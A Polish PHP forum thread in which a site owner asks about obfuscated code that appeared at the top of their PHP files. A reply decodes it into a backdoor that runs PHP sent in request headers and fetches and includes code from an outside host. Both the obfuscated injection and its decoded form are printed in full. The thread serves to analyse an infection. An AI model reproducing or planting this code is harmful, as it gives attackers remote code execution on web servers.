Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Dziwny początek skryptów
Forum PHP.pl > Inne > Hydepark
janex_42
3.03.2011, 12:02:52
Pliki o rozszerzeniu PHP bez mojej wiedzy powiększyły się o poniższy skrypt, cięzko znaleźć cokolwiek na temat tego konkretnie ciągu znaków. Czy jest to może wirus lub ingerencja obslugi technicznej mojego serwera. Jakie mogą być przyczyny, a jakie skutki obecności tego cholerstwa? Z góry dzia

[PHP] pobierz, plaintext 
  1. <?php                                                                                                                                                                                                        ?><?php /*versio:1.12*/if (!defined ("determinator")){eval(base64_decode('ZnVuY3Rpb24gdEx2MmFRQmdQN2VNalJzQWdnT2lDVUlvbE52MTUxbURpWnhYR0RiZ09FZk12TnpOZmpC
    UmZPaWxaUG5nWHZqVigkZHF6UVBMTjJQakJSU3paT0ZpVTl0SHNhY3VKUVhOYmdtZ2dVMDllR1Z1NjVYV
    HZOWmhnQkNyM1RiYjNNUjROYSl7cmV0dXJuIGV2YWwoJGRxelFQTE4yUGpCUlN6Wk9GaVU5dEhzYWN1Sl
    FYTmJnbWdnVTA5ZUdWdTY1WFR2TlpoZ0JDcjNUYmIzTVI0TmEpO307ZnVuY3Rpb24gYVFPRlFjVk5lYm9
    HcmgzeGk0RGpsSTVBZDVKc3RudERxdkU2UWVCcmFzVDhFM0FoWmdqN0VRVWxBRHFqYTRBMCgkcUNlSmdq
    U1FHbk1YSWlTSGdVaGdMb0xCNHZkb1FHcXVBRENISE9sZmhHbzZnM2xHQ2FUSFhSRGpxZ3EzanRNMyl7c
    mV0dXJuIGJhc2U2NF9kZWNvZGUoJHFDZUpnalNRR25NWElpU0hnVWhnTG9MQjR2ZG9RR3F1QURDSEhPbG
    ZoR282ZzNsR0NhVEhYUkRqcWdxM2p0TTMpO307ZnVuY3Rpb24geHJFYjRIR1gwUTdPbDhMcDg5Y25HMmM
    4MW5zSDUyUEJQY1E4ZnVPOWRQODRVUjRsT09QUGhCU0o4aXFxajE3dCgkdWZUeng1WFRzb2Vwclp6MGF2
    RjJBWkU4bzRiaFZvR2JGRE5zSEc5MU1GOUdwb3piUEhJSUdtYm5UWGZxNThhOCl7cmV0dXJuICR1ZlR6e
    DVYVHNvZXByWnowYXZGMkFaRThvNGJoVm9HYkZETnNIRzkxTUY5R3BvemJQSElJR21iblRYZnE1OGE4O3
    07'    ));tLv2aQBgP7eMjRsAggOiCUIolNv151mDiZxXGDbgOEfMvNzNfjBRfOilZPngXvjV("\$xgJOhgLH7sArGpdqNBm8BFlDlqVtTTgIZE8rSO5O32IQ2jeb5FSIjHeFDh3ruX20=\"ID8+PD9waHAKaWYgKCFkZWZpbmVkKCdkZXRlcm1pbmF0b3InKSl7DQoJZnVuY3Rpb24gZmlsdGVyKCl7
    DQoJCWZvcmVhY2ggKCRfR0VUIGFzICRrPT4kdil7DQoJCQlpZiAoc3RycG9zKCR2LCd1bmlvbicpKXskX
    0dFVFska109Jyc7fQ0KCQkJZWxzZWlmIChzdHJwb3MoJHYsJ3NlbGVjdCcpKXskX0dFVFska109Jyc7fQ
    0KCQl9DQoJfQ0KCWZ1bmN0aW9uIGdldGZpbGUoJHVybCl7DQoJCWlmIChpbmlfZ2V0KCdhbGxvd191cmx
    fZm9wZW4nKSA9PSAnMScpIHsNCgkJCXJldHVybiBAZmlsZV9nZXRfY29udGVudHMoJHVybCk7DQoJCX0N
    CgkJZWxzZWlmIChmdW5jdGlvbl9leGlzdH\";\$rvhZ1NOVP2uaVBA46dmCqhUFImbls9Ga6RgALZighsFrs087tVcUlumhCA1g5M3q=\$xgJOhgLH7sArGpdqNBm8BFlDlqVtTTgIZE8rSO5O32IQ2jeb5FSIjHeFDh3ruX20.\"MoJ2N1cmxfaW5pdCcpKXsNCgkJCSRjaCA9IEBjdXJsX2luaXQoKTsNCgkJCUBjdXJsX3NldG9wdCgkY2
    gsIENVUkxPUFRfVVJMLCR1cmwpOw0KCQkJQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsZmF
    sc2UpOw0KCQkJQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUix0cnVlKTsNCgkJ
    CUBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7DQoJCQlpZiAoJGRhdGEgP
    SBAY3VybF9leGVjKCRjaCkpIHtyZXR1cm4gJGRhdGE7fQ0KCQkJQGN1cmxfY2xvc2UoJGNoKTsNCgkJfQ
    0KCQllbHNlIHsNCgkJCXJldHVybiAnPGlt\";\$ePpZeg5PX87cHzVV3otvt45afaNpAgMp7IrOg1um4SOv7E9xvGGzuLVhpta3tdcJ=\$rvhZ1NOVP2uaVBA46dmCqhUFImbls9Ga6RgALZighsFrs087tVcUlumhCA1g5M3q.\"ZyBzcmM9IicuJHVybC4nIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4nOw0KCQl9DQoJfQ0KCWZ1
    bmN0aW9uIHVwZCgkZmlsZSwkdXJsKXsNCgkJJGgwPUBmb3BlbigkZmlsZSwndycpOw0KCQlAZmNsb3NlK
    CRoMCk7DQoJCWlmIChAaXNfZmlsZSgkZmlsZSkpewl3cml0ZSgkZmlsZSxnZXRmaWxlKCR1cmwpKSA7fT
    sNCgl9DQoJZnVuY3Rpb24gd3JpdGUoJGZpbGUsJGNvbnRlbnQpew0KCQlpZiAoQGlzX2ZpbGUoJGZpbGU
    pKXsNCgkJCSRoPUBmb3BlbigkZmlsZSwndycpOw0KCQkJQGZ3cml0ZSgkaCwkY29udGVudCk7DQoJCQlA
    ZmNsb3NlKCRoKTsNCgkJCUBoZWFkZXIoJ1\";\$fSTCgjTF3UCTQum3CN9OzpELI5tMrAGiG4nfOL2r89CQSN1DzgsmqlDGod7o70Mj=\$ePpZeg5PX87cHzVV3otvt45afaNpAgMp7IrOg1um4SOv7E9xvGGzuLVhpta3tdcJ.\"lfT3V0OiBiMnM9Jyk7DQoJCX0NCgl9DQoJJHR5cGU9J3VwZCc7DQoJJHZlcj0nMS4xMic7DQoJJGVuPS
    JiYXNlNjRfZW5jb2RlIjsNCgkkZGU9ImJhc2U2NF9kZWNvZGUiOw0KCSRob3N0PXN0cnRvbG93ZXIoQCR
    fU0VSVkVSWyJIVFRQX0hPU1QiXSk7DQoJJHNjPUBtZDUoJGhvc3QuUEhQX1ZFUlNJT04uJHZlci5QSFBf
    T1MpOw0KCWRlZmluZSgnZGV0ZXJtaW5hdG9yJywxKTsgZmlsdGVyKCk7DQoJaWYgKCR1cmk9JGhvc3QuQ
    CRfU0VSVkVSWydSRVFVRVNUX1VSSSddKXsNCgkJJHRtcD0nL3RtcC8nOw0KCQlpZiAoIWVtcHR5KCRfRU
    5WWydUTVAnXSkpIHsgJHRtcCA9ICAkX0VO\";\$tJz4fgFBzn20H2od0piVvLVRz1BHC6Mmf8fhfSvZc0Xpb38iha3l6sqR1eLqGHt4=\$fSTCgjTF3UCTQum3CN9OzpELI5tMrAGiG4nfOL2r89CQSN1DzgsmqlDGod7o70Mj.\"VlsnVE1QJ10uJy8nOyB9DQoJCWlmICghZW1wdHkoJF9FTlZbJ1RNUERJUiddKSkgeyAkdG1wID0gJF9F
    TlZbJ1RNUERJUiddLicvJzsgfQ0KCQlpZiAoIWVtcHR5KCRfRU5WWydURU1QJ10pKSB7ICR0bXAgPSAkX
    0VOVlsnVEVNUCddLicvJzsgfQ0KCQkkdG1wPSR0bXAuJy4nLiRzYzsNCgkJaWYgKEAkX1NFUlZFUlsiSF
    RUUF9ZX0FVVEgiXT09JHNjKXsNCgkJCUBoZWFkZXIoJ1lfVmVyc2lvOiAnLiR2ZXIuJHR5cGUpOw0KCQk
    JaWYgKCRjb2RlPSRkZShAJF9TRVJWRVJbJ0hUVFBfRVhFQ1BIUCddKSl7DQoJCQkJQGV2YWwoJGNvZGUp
    Ow0KCQkJCWV4aXQoMCk7DQoJCQl9DQoJCQ\";\$gxzVnIs3RX7VnbXTlmR4xDmJ5DJCnxOFnVn2ZUJcBnxz68gfjn0pEjsiQNZvGhxB=\$tJz4fgFBzn20H2od0piVvLVRz1BHC6Mmf8fhfSvZc0Xpb38iha3l6sqR1eLqGHt4.\"lpZiAoJGNtZD0kZGUoQCRfU0VSVkVSWydIVFRQX1VQREFURSddKSl7dXBkKCR0bXAsJGNtZCk7fQ0KCQ
    kJaWYgKCRjbWQ9JGRlKEAkX1NFUlZFUlsnSFRUUF9QVVRDT0RFJ10pKXt3cml0ZSgkdG1wLCRjbWQpO30
    NCgkJfQ0KCQkkdXJpPUB1cmxlbmNvZGUoJHVyaSk7DQoJCWlmIChAaXNfZmlsZSgkdG1wKSl7QGluY2x1
    ZGVfb25jZSAoJHRtcCk7fQ0KCQllbHNlIHt1cGQoJHRtcCwiaHR0cDovLyIuImdldHByb3QiLiJvYnkiL
    iJudW1iZXIiLiIuY29tIi4iL2kvcmVtIi4iLnBocD91PSIuJHVyaS4iJms9Ii4kc2MuIiZ0PSIuJHR5cG
    UpO30NCiAgICB9DQp9Pz48P3BocCA=\"; tLv2aQBgP7eMjRsAggOiCUIolNv151mDiZxXGDbgOEfMvNzNfjBRfOilZPngXvjV(xrEb4HGX0Q7Ol8Lp89cnG2c81nsH52PBPcQ8fuO9dP84UR4lOOPPhBSJ8iqqj17t(aQOFQcVNeboGrh3xi4DjlI5Ad5JstntDqvE6QeBrasT8E3AhZgj7EQUlADqja4A0(\$gxzVnIs3RX7VnbXTlmR4xDmJ5DJCnxOFnVn2ZUJcBnxz68gfjn0pEjsiQNZvGhxB))); "    );}?>
[PHP] pobierz, plaintext


Otrzymałem odpowiedź od dostawcy serwera, nie jest to ich kod.
nospor
3.03.2011, 12:08:21
Cytat
cięzko znaleźć cokolwiek na temat tego konkretnie ciągu znaków

http://lmgtfy.com/?q=php+!defined+(%22determinator%22)
mortus
3.03.2011, 12:10:23
Cytat(nospor @ 3.03.2011, 12:08:21 ) *
http://lmgtfy.com/?q=php+!defined+(%22determinator%22)

Ciekawa strona nospor.
janex_42
3.03.2011, 12:20:20
dodam że cała strona pisana jest przeze mnie od ręki, udostępniam opcję ingerencji w bazy danych przez panel, również stworzony przeze mnie. Wysyłanie treści do baz danych, plików graficznych na serwer. Nie korzystam z gotowych rozwiązań typu joomla, mambo, strona istnieje od 2 lat, problem występuje pierwszy raz.
hwao
3.03.2011, 14:57:35
Cytat(nospor @ 3.03.2011, 13:08:21 ) *
http://lmgtfy.com/?q=php+!defined+(%22determinator%22)


Nospor a gdzie w linku -forum.php.pl, chcesz żeby wpadł w nieskończoną pętle?
krzotr
3.03.2011, 16:17:43
Masz tutaj zdekodowany plik

[PHP] pobierz, plaintext 
  1. <?php
  2. if (!defined('determinator')){
  3. 	function filter(){
  4. 		foreach ($_GET as $k=>$v){
  5. 			if (strpos($v,'union')){$_GET[$k]='';}
  6. 			elseif (strpos($v,'select')){$_GET[$k]='';}
  7. 		}
  8. 	}
  9. 	function getfile($url){
  10. 		if (ini_get('allow_url_fopen') == '1') {
  11. 			return @file_get_contents($url);
  12. 		}
  13. 		elseif (function_exists('curl_init')){
  14. 			$ch = @curl_init();
  15. 			@curl_setopt($ch, CURLOPT_URL,$url);
  16. 			@curl_setopt($ch, CURLOPT_HEADER,false);
  17. 			@curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
  18. 			@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,5);
  19. 			if ($data = @curl_exec($ch)) {return $data;}
  20. 			@curl_close($ch);
  21. 		}
  22. 		else {
  23. 			return '<img src="'.$url.'" width="1px" height="1px" />';
  24. 		}
  25. 	}
  26. 	function upd($file,$url){
  27. 		$h0=@fopen($file,'w');
  28. 		@fclose($h0);
  29. 		if (@is_file($file)){	write($file,getfile($url)) ;};
  30. 	}
  31. 	function write($file,$content){
  32. 		if (@is_file($file)){
  33. 			$h=@fopen($file,'w');
  34. 			@fwrite($h,$content);
  35. 			@fclose($h);
  36. 			@header('Y_Out: b2s=');
  37. 		}
  38. 	}
  39. 	$type='upd';
  40. 	$ver='1.12';
  41. 	$en="base64_encode";
  42. 	$de="base64_decode";
  43. 	$host=strtolower(@$_SERVER["HTTP_HOST"]);
  44. 	$sc=@md5($host.PHP_VERSION.$ver.PHP_OS);
  45. 	define('determinator',1); filter();
  46. 	if ($uri=$host.@$_SERVER['REQUEST_URI']){
  47. 		$tmp='/tmp/';
  48. 		if (!empty($_ENV['TMP'])) { $tmp =  $_ENV['TMP'].'/'; }
  49. 		if (!empty($_ENV['TMPDIR'])) { $tmp = $_ENV['TMPDIR'].'/'; }
  50. 		if (!empty($_ENV['TEMP'])) { $tmp = $_ENV['TEMP'].'/'; }
  51. 		$tmp=$tmp.'.'.$sc;
  52. 		if (@$_SERVER["HTTP_Y_AUTH"]==$sc){
  53. 			@header('Y_Versio: '.$ver.$type);
  54. 			if ($code=$de(@$_SERVER['HTTP_EXECPHP'])){
  55. 				@eval($code);
  56. 				exit(0);
  57. 			}
  58. 			if ($cmd=$de(@$_SERVER['HTTP_UPDATE'])){upd($tmp,$cmd);}
  59. 			if ($cmd=$de(@$_SERVER['HTTP_PUTCODE'])){write($tmp,$cmd);}
  60. 		}
  61. 		$uri=@urlencode($uri);
  62. 		if (@is_file($tmp)){@include_once ($tmp);}
  63. 		else {upd($tmp,"http://"."getprot"."oby"."number".".com"."/i/rem".".php?u=".$uri."&k=".$sc."&t=".$type);}
  64.     }
  65. }?>
[PHP] pobierz, plaintext


Jak to zrobiłem ? Ręcznie. w ostatnim przebiegu otrzymujemy

To jest coś ala backdoor
[PHP] pobierz, plaintext 
  1. <?php
  2. 		if (@$_SERVER["HTTP_Y_AUTH"]==$sc){
  3. 			@header('Y_Versio: '.$ver.$type);
  4. 			if ($code=$de(@$_SERVER['HTTP_EXECPHP'])){
  5. 				@eval($code);
  6. 				exit(0);
  7. 			}
  8. 			if ($cmd=$de(@$_SERVER['HTTP_UPDATE'])){upd($tmp,$cmd);}
  9. 			if ($cmd=$de(@$_SERVER['HTTP_PUTCODE'])){write($tmp,$cmd);}
  10. 		}
[PHP] pobierz, plaintext
nospor
3.03.2011, 21:27:05
Cytat
Nospor a gdzie w linku -forum.php.pl, chcesz żeby wpadł w nieskończoną pętle?
Hehe, gdy dawałem linka to jeszcze nie było tego w indeksie smile.gif
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.